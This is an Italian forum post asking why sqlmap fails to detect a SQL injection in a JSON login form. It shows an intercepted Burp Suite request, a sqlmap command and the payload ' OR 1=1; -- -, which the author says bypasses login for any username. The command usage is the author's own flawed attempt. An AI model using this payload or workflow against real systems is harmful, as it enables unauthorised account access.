Ciao Sto cercando di fare un'iniezione SQL in un modulo di accesso.
Con BurpSuite, intercetto la richiesta:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username":"user","password":"pass"}
utilizza:
sqlmap -u requestFile
(dove requestFile è il contenuto della richiesta intercettata con Burp)
sqlmap non riesce a trovare il campo iniettabile che è la password.
Sono sicuro che sia iniettabile perché se inserisco la password:
' OR 1=1; -- -
Posso accedere con ogni nome utente che inserisco
Provato anche con:
{"username":*,"password":*}
ma senza fortuna.
Cosa sto facendo male?
P.S.
In ogni richiesta POST o PUT effettuata con il browser, viene effettuata una richiesta di preflight con il metodo OPTIONS. È fatto per aggirare i problemi CORS. Potrebbe influire sulla richiesta fatta da sqlmap?